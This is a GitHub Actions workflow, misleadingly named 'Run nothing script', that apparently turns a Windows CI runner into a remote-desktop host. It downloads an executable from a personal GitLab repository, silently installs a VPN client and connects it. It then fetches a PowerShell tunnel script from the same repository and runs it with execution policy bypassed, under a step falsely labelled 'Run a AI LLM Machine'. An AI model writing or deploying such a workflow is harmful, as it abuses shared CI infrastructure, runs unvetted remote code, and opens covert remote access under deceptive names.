name: Run nothing script

on:
  workflow_dispatch:

jobs:
  run-rdp:
    runs-on: windows-latest
    timeout-minutes: 0
    steps:
      - name: Connect VPN using TunSafe installer
        shell: powershell
        run: |
          Invoke-WebRequest -Uri "https://gitlab.com/gitrdp124/sv2025-rdp/-/raw/main/wgcf.exe" -OutFile "wgcf.exe" -Verbose
          .\wgcf.exe register
          .\wgcf.exe generate

          Copy-Item -Path ".\wgcf-profile.conf" -Destination "C:\wgcf-profile.conf"

          aria2c -x 8 -s 8 https://tunsafe.com/downloads/TunSafe-1.5-rc2.exe
          Start-Process -FilePath ".\TunSafe-1.5-rc2.exe" -ArgumentList "/S" -Wait

          & "C:\Program Files\TunSafe\tunsafe.exe" -config "C:\wgcf-profile.conf" --connect
          Start-Sleep -Seconds 10

      - name: Run a AI LLM Machine
        shell: powershell
        run: |
          iwr -Uri "https://gitlab.com/gitrdp124/sv2025-rdp/-/raw/main/argo_tunnel.ps1" -OutFile "argo.ps1"
          powershell -ExecutionPolicy Bypass -File .\argo.ps1
